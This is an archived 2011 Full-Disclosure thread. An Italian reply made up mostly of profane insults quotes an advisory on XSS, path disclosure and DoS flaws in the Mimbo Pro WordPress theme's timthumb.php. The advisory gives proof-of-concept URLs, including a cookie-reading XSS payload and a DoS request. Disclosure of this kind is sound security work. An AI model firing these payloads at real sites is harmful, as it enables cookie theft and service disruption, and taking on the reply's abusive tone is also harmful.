| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 14 Apr 2011 20:51:54 +0200 From: Michele Orru <antisnatchor@...il.com> To: MustLive <mustlive@...security.com.ua> Cc: full-disclosure@...ts.grok.org.uk, submissions@...ketstormsecurity.org Subject: Re: Vulnerabilities in Mimbo Pro theme for WordPress /italian/ eh bona con sti advisory di merda. hai rotto il cazzo mustlive. ma non ti senti un noob ad usare acunetix e riportare le vulnerabilita? e poi sempre sulla stessa roba cristo... non farmi aggiungere una regola anti-spam per il tuo indirizzo di merda. e ke kezzo (banfi) /italian/ antisnatchor > ------------------------------------------------------------------------ > > MustLive <mailto:mustlive@...security.com.ua> > April 14, 2011 8:44 PM > > > Hello list! > > I want to warn you about Cross-Site Scripting, Full path disclosure, Abuse > of Functionality and Denial of Service vulnerabilities in Mimbo Pro theme > for WordPress. It's commercial theme for WP by developer of TimThumb. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are Mimbo Pro 2.3.1 and previous versions. XSS is possible only > in old versions of the theme. After my informing, developer have fixed > almost all vulnerabilities. > > ---------- > Details: > ---------- > > XSS (WASC-08): > > http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E > > Full path disclosure (WASC-13): > > http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site > > http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1&w=1111111 > > http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1111111&w=1 > > http://site/wp-content/themes/mimbopro/ > > And also tens of php-scripts of the theme in folder /mimbopro/ and all > subfolders. > > Abuse of Functionality (WASC-42): > > http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site&h=1&w=1 > > DoS (WASC-10): > > http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/big_file&h=1&w=1 > > About such AoF and DoS vulnerabilities I wrote in article Using of the > sites > for attacks on other sites > (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). > > ------------ > Timeline: > ------------ > > 2011.02.08 - informed developer about vulnerabilities in TimThumb. > 2011.02.08 - announced at my site. > 2011.02.09 - informed developer about vulnerabilities in Mimbo Pro. > 2011.02.13 - developer released TimThumb 1.25 and begun updating > TimThumb in all his themes. > 2011.04.14 - disclosed at my site. > > I mentioned about these vulnerabilities at my site > (http://websecurity.com.ua/4913/). > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Content of type "text/html" skipped Download attachment "compose-unknown-contact.jpg" of type "image/jpeg" (1421 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists